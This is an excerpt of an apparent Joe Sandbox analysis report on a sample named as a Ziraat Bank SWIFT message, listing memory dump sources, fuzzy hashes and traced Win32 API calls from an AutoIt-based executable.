                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                        • Instruction ID: ec6d63e2590df344e8ddf0b236a938d19c5e639f97e8e5d3ebab60ae1a970a7b
                                                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                        • Instruction Fuzzy Hash: E5C1903220909309DFAD463AC47443EBBE15BA2BB531A077DD8B3CB5E5EF20D564E620
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                        • Instruction ID: 9a87fadf9ff319f0e7ea98e1b7d0c6a00fa2322d0c0b93bc08c533f74a7d95d3
                                                                                                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                        • Instruction Fuzzy Hash: DB41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                        • Instruction ID: 7af8dd37069703745a74987788f45097a1f1e5240bd8d707294ab170cb54b0b5
                                                                                                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                        • Instruction Fuzzy Hash: 4F019278A00109EFCB44DF98D5909AEF7F6FB48310FA08599E909A7741D730AE41DB80
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                        • Instruction ID: 42a9274b1c9b62c4b189c22b0f19f52449f8ac7bcff44644cc086db62972b5bf
                                                                                                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                        • Instruction Fuzzy Hash: BE01A478A00109EFCB44DF98D5909AEF7F5FF48314FA08599E919A7341D730AE42DB80
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 000DA2FE
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 000DA310
                                                                                                                                                        • DestroyWindow.USER32 ref: 000DA31E
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000DA338
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 000DA33F
                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000DA480
                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000DA490
                                                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA4D8
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 000DA4E4
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000DA51E
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA540
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA553
                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA55E
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 000DA567
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA576
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 000DA57F
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA586
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 000DA591
                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA5A3
                                                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0010D9BC,00000000), ref: 000DA5B9
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 000DA5C9
                                                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 000DA5EF
                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 000DA60E
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA630
                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA81D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                                        • Opcode ID: fffc008b2e07b5a557e8ffc958ea9ecfb08e06658dab1b9fa571f9d277125d67
                                                                                                                                                        • Instruction ID: 102cedf6d2e41484313e8c80d2d021a9f38a948617e3d0f0bdbc13a04c16971a
                                                                                                                                                        • Opcode Fuzzy Hash: fffc008b2e07b5a557e8ffc958ea9ecfb08e06658dab1b9fa571f9d277125d67
                                                                                                                                                        • Instruction Fuzzy Hash: 9A027C75A00204EFDB14DFA4DD89EAE7BB9FB49310F048159F955AB2A1CB70ED81CB60
                                                                                                                                                        APIs
                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 000ED2DB
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 000ED30C
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 000ED318
                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 000ED332
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 000ED341
                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 000ED36C
                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 000ED374
                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 000ED37B
                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 000ED38A
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 000ED391
                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 000ED3DC
                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 000ED40E
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 000ED439
                                                                                                                                                          • Part of subcall function 000ED575: GetSysColor.USER32(00000012), ref: 000ED5AE
                                                                                                                                                          • Part of subcall function 000ED575: SetTextColor.GDI32(?,?), ref: 000ED5B2
                                                                                                                                                          • Part of subcall function 000ED575: GetSysColorBrush.USER32(0000000F), ref: 000ED5C8
                                                                                                                                                          • Part of subcall function 000ED575: GetSysColor.USER32(0000000F), ref: 000ED5D3
                                                                                                                                                          • Part of subcall function 000ED575: GetSysColor.USER32(00000011), ref: 000ED5F0
                                                                                                                                                          • Part of subcall function 000ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED5FE
                                                                                                                                                          • Part of subcall function 000ED575: SelectObject.GDI32(?,00000000), ref: 000ED60F
                                                                                                                                                          • Part of subcall function 000ED575: SetBkColor.GDI32(?,00000000), ref: 000ED618
                                                                                                                                                          • Part of subcall function 000ED575: SelectObject.GDI32(?,?), ref: 000ED625
                                                                                                                                                          • Part of subcall function 000ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 000ED644
                                                                                                                                                          • Part of subcall function 000ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED65B
                                                                                                                                                          • Part of subcall function 000ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 000ED670
                                                                                                                                                          • Part of subcall function 000ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED698
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3521893082-0
                                                                                                                                                        • Opcode ID: f55e3284c78c78b380c43d4cb21f742dbe7ff3fe670e0c95b6fee76b8c3c702e
                                                                                                                                                        • Instruction ID: d2c618cdeb479e62c41f2a24dce3aec7cd6917e71694e203ff9ec1e6a3808115
                                                                                                                                                        • Opcode Fuzzy Hash: f55e3284c78c78b380c43d4cb21f742dbe7ff3fe670e0c95b6fee76b8c3c702e
                                                                                                                                                        • Instruction Fuzzy Hash: 39917271408301BFC7109FA4EC08A6B7BF9FF85325F104A19F9A2A61E0DBB1D984CB52
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32 ref: 0009B98B
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0009B9CD
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0009B9D8
                                                                                                                                                        • DestroyIcon.USER32(00000000), ref: 0009B9E3
                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0009B9EE
                                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 000FD2AA
                                                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000FD2E3
                                                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 000FD711
                                                                                                                                                          • Part of subcall function 0009B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0009B759,?,00000000,?,?,?,?,0009B72B,00000000,?), ref: 0009BA58
                                                                                                                                                        • SendMessageW.USER32 ref: 000FD758
                                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000FD76F
                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 000FD785
                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 000FD790
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 464785882-4108050209
                                                                                                                                                        • Opcode ID: b7d1f9e2f3229cf0e1272a0e91db09e8a4685d07c3341e162c575be5132496b7
                                                                                                                                                        • Instruction ID: 831104680da42e1f52e8af9b46d71c1cec49aee4712c43d62f431a76ad595b5e
                                                                                                                                                        • Opcode Fuzzy Hash: b7d1f9e2f3229cf0e1272a0e91db09e8a4685d07c3341e162c575be5132496b7
                                                                                                                                                        • Instruction Fuzzy Hash: 21129E30104205DFDB61DF28D988BB9B7E6FF45314F14456AEA89CBA62C731EC81EB91
                                                                                                                                                        APIs
                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 000D9F83
                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000DA042
                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 000DA080
                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 000DA092
                                                                                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 000DA0D8
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 000DA0E4
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 000DA128
                                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000DA137
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 000DA147
                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 000DA14B
                                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 000DA15B
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000DA164
                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 000DA16D
                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000DA19B
                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 000DA1B2
                                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 000DA1ED
                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000DA201
                                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 000DA212
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 000DA242
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 000DA24D
                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000DA258
                                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 000DA262
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                                        • Opcode ID: d68d7c9191f0bbc07b75f0f5b310da50dfd838caaf21b1aac5526b0bab82bc8d
                                                                                                                                                        • Instruction ID: ac43b604502d5926bafa18f6110530a50a12d53fdc978612023e08d9a073b3ab
                                                                                                                                                        • Opcode Fuzzy Hash: d68d7c9191f0bbc07b75f0f5b310da50dfd838caaf21b1aac5526b0bab82bc8d
                                                                                                                                                        • Instruction Fuzzy Hash: C3A17C75A40214BFEB14DFA8DC4AFAE7BB9EB05710F004115FA14A76E0DBB0AD81CB64
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 000CDBD6
                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,0011DC54,?,\\.\,0011DC00), ref: 000CDCC3
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,0011DC54,?,\\.\,0011DC00), ref: 000CDE29
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                                        • Opcode ID: 4adf32598cf13d96bebc2418b81f1fdfaf22399d51f39179f462980c7a413522
                                                                                                                                                        • Instruction ID: 16a5b03ebc0a773bb4fc7c39ee38482f20ef04f53cd8ca9183211f083994c9c8
                                                                                                                                                        • Opcode Fuzzy Hash: 4adf32598cf13d96bebc2418b81f1fdfaf22399d51f39179f462980c7a413522
                                                                                                                                                        • Instruction Fuzzy Hash: 33519D30648302ABC620EB54C882E6DB7E0FB94705F24597FF0679B296DB70D985DB46
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                        • API String ID: 1038674560-86951937
                                                                                                                                                        • Opcode ID: 42cc0032a40636f642ff7d55114dea415b8abbf50152787c4e5615a41b137c46
                                                                                                                                                        • Instruction ID: 3bfe51be466d9ed9a3cc125d42735bf78402170940cd8bec146a1fec842c9fc9
                                                                                                                                                        • Opcode Fuzzy Hash: 42cc0032a40636f642ff7d55114dea415b8abbf50152787c4e5615a41b137c46
                                                                                                                                                        • Instruction Fuzzy Hash: F281E531640219ABEB24BAA4ED42FFE37B9BF25310F044039F945AA1C3EB74D945D3A5
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 000EC788
                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 000EC83E
                                                                                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 000EC859
                                                                                                                                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 000ECB15
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 2326795674-4108050209
                                                                                                                                                        • Opcode ID: 982314e4e73c918fb67701b128bea64baecb13dd345301c4e6073d8264070eea
                                                                                                                                                        • Instruction ID: fdbc6542cbb844a4303a6e07a3c87614a0a1b846099a602d121b6bdc2e0be384
                                                                                                                                                        • Opcode Fuzzy Hash: 982314e4e73c918fb67701b128bea64baecb13dd345301c4e6073d8264070eea
                                                                                                                                                        • Instruction Fuzzy Hash: E5F1D371204381AFF7618F25CC49FAABBE4FF45354F18052DF599A62A1C776C882CB92
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 000ED5AE
                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 000ED5B2
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 000ED5C8
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 000ED5D3
                                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 000ED5D8
                                                                                                                                                        • GetSysColor.USER32(00000011), ref: 000ED5F0
                                                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED5FE
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 000ED60F
                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 000ED618
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 000ED625
                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 000ED644
                                                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED65B
                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 000ED670
                                                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED698
                                                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000ED6BF
                                                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 000ED6DD
                                                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 000ED6E8
                                                                                                                                                        • GetSysColor.USER32(00000011), ref: 000ED6F6
                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 000ED6FE
                                                                                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 000ED712
                                                                                                                                                        • SelectObject.GDI32(?,000ED2A5), ref: 000ED729
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 000ED734
                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 000ED73A
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 000ED73F
                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 000ED745
                                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 000ED74F
                                                                                                                                                        Memory Dump Source
